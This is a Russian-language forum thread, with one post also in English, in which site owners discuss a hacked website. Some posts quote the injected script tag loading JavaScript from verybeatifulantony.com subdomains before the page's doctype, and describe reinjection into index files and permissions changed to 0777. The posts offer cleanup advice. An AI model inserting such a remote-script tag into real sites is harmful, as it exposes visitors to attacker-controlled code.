Сайт взломали?

kuzalex, привет.

хостится на таймвебе

Аминь.

Что это может быть и как пофиксить?

Смотрите логи доступа и логи ошибок для начала.

UPD.: https://room.verybeatifulantony.com/t.js — полагаю, не знаете откуда это, да? Запрашивается 6 раз, расположен перед <!DOCTYPE html>:
<script type=text/javascript src='https://room.verybeatifulantony.com/t.js'></script><!DOCTYPE html>

kuzalex, сайт взломан, далее уже вам надо как можно скорее выяснять подробности. Посмотрите файлы темы, они модифицированы с вероятностью в 99%.

З.Ы.: восстанавливать вы можете до упора, но это не решит проблему, если что. Как минимум, вы можете временно закрыть сайт ото всех, кроме себя, и уже в более спокойном режиме начать разбираться с проблемой.

kuzalex, без проблем 🙂 Будут вопросы по данной проблеме — обращайтесь.

Аналогичная ситуация на nic.ru Пока решил перезапуском (восстановлением базы). Дпльше конечно нужно смотреть. в MyPHP следов не нашел. Просто поверх переписана новая БД.

hello everyone, I recommend you check for a script «<script type = ‘text / javascript’ src = ‘https: //tom.verybeatifulantony.com/y.js’> </script>» It must be inserted in the first lines of the index. * files (php, html, htm). It must be removed.

You will need to remove all of these files, otherwise, it will continue to be inserted into these files each time you access as a user with administrative rights.

You will also see that the «rights» of the file permissions have been changed to RWX (read, write, execute) for all groups (Owner, Group and Others) — normally «0644» is changed to «0777».

———
Привет всем, я рекомендую вам проверить наличие скрипта «<script type = ‘text / javascript’ src = ‘https: //tom.verybeatifulantony.com/y.js’> </ script>» Он должен быть вставлен в первый строки индекса. * файлы (php, html, htm). Это должно быть удалено.

Вам нужно будет удалить все эти файлы, в противном случае они будут продолжать вставляться в эти файлы каждый раз, когда вы получаете доступ как пользователь с правами администратора.

Вы также увидите, что «права» прав доступа к файлам были изменены на RWX (чтение, запись, выполнение) для всех групп (Владелец, Группа и другие) — обычно «0644» изменяется на «0777».

Я надеюсь, что это помогает.
Поскольку многие файлы могли быть затронуты, лучшим способом было бы восстановить предыдущую резервную копию.
Для меня первая проверка проблемы была 17 февраля.